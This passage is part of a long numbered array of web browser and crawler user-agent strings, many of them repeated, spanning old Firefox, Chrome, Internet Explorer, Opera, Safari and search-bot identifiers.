  553. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  554. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  555. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  556. "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  557. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  558. "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  559. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  560. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
  561. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  562. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  563. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  564. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  565. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  566. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  567. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  568. "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  569. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  570. "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  571. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  572. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
  573. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  574. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  575. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  576. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  577. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  578. "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
  579. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  580. "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
  581. "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
  582. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
  583. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  584. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
  585. "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
  586. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
  587. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  588. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
  589. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
  590. "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
  591. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
  592. "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
  593. "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
  594. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
  595. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  596. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
  597. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
  598. "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  599. "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  600. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  601. "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
  602. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  603. "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
  604. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
  605. "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
  606. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
  607. "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  608. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
  609. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
  610. "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  611. "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  612. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  613. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  614. "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
  615. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  616. "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
  617. "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
  618. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
  619. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  620. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
  621. "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
  622. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
  623. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  624. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
  625. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
  626. "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
  627. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
  628. "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
  629. "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
  630. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
  631. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  632. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
  633. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
  634. "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  635. "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  636. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  637. "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
  638. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  639. "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
  640. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
  641. "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
  642. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
  643. "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  644. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
  645. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
  646. "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  647. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
  648. "Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
  649. "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
  650. "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
  651. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
  652. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
  653. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
  654. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
  655. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
  656. "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
  657. "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
  658. "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
  659. "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10",
  660. "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.5.24 Version/10.52",
  661. "Mozilla/5.0 (Linux; Android 6.0.1; SM-G920V Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36",
  662. "Opera/8.5 (X11; i686 Linux; U; ru, en_US)",
  663. "SexShop.Sg/Nutch-1.1 (www.SexShop.Sg; crawler@SexShop.Sg)",
  664. "Rome Client (http://tinyurl.com/64t5n) Ver: 0.9",
  665. "Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.13918/19.752; U; ru) Presto/2.6.25",
  666. "Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.5.22 Version/10.50",
  667. "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53 MM3-WebAssistant",
  668. "C4PC UserAgent/0.7",
  669. "Googlebot 1.01.003",
  670. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
  671. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3",
  672. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
  673. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0","Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  674. "Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)",
  675. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  676. "Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
  677. "Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0",
  678. "Opera/6.04 (Windows XP; U) [en]",
  679. "Opera/9.99 (X11; U; sk)",
  680. "Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5",
  681. "Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc",
  682. "Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk",
  683. "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
  684. "Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)",
  685. "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15"
  686. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  687. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  688. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  689. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  690. "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  691. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  692. "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  693. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  694. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
  695. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  696. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  697. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  698. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  699. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  700. "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
  701. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  702. "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
  703. "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
  704. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
  705. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  706. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
  707. "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
  708. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
  709. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  710. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
  711. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
  712. "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
  713. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
  714. "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
  715. "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
  716. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
  717. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  718. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
  719. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
  720. "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  721. "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  722. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  723. "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
  724. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  725. "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
  726. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
  727. "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
  728. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
  729. "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  730. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
  731. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
  732. "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  733. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
  734. "Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
  735. "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
  736. "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
  737. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
  738. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
  739. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
  740. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
  741. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
  742. "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
  743. "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
  744. "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
  745. "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10",
  746. "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.5.24 Version/10.52",
  747. "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)",
  748. "Opera/8.5 (X11; i686 Linux; U; ru, en_US)",
  749. "SexShop.Sg/Nutch-1.1 (www.SexShop.Sg; crawler@SexShop.Sg)",
  750. "Rome Client (http://tinyurl.com/64t5n) Ver: 0.9",
  751. "Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.13918/19.752; U; ru) Presto/2.6.25",
  752. "Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.5.22 Version/10.50",
  753. "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53 MM3-WebAssistant",
  754. "C4PC UserAgent/0.7",
  755. "Googlebot 1.01.003",
  756. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
  757. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3",
  758. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
  759. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0",
  760. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:24.0) Gecko/20100101 Firefox/24.0",
  761. "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)",
  762. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  763. "Mozilla/5.0 (iPad; U; CPU OS 5_1 like Mac OS X) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10 UCBrowser/3.4.3.532",
  764. "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
  765. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1a2pre) Gecko/2008073000 Shredder/3.0a2pre ThunderBrowse/3.2.1.8",
  766. "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.10) Gecko/20050716 Thunderbird/1.0.6",
  767. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7pre) Gecko/20100925 Firefox/4.0b7pre",
  768. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5pre) Gecko/2008032619 Linpus/3.0-0.49.3.0b5pre.lp Minefield/3.0b5pre",
  769. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.3a1pre) Gecko/20100128 Minefield/3.7a1pre",
  770. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a9pre) Gecko/2007100205 Minefield/3.0a9pre",
  771. "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9a4pre) Gecko/20070402 Minefield/3.0a4pre",
  772. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041103 Firefox/1.0RC2",
  773. "Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0",
  774. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  775. "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0",
  776. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101230 Mandriva Linux/1.9.2.13-0.2mdv2010.2 (2010.2) Firefox/3.6.13",
  777. "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
  778. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
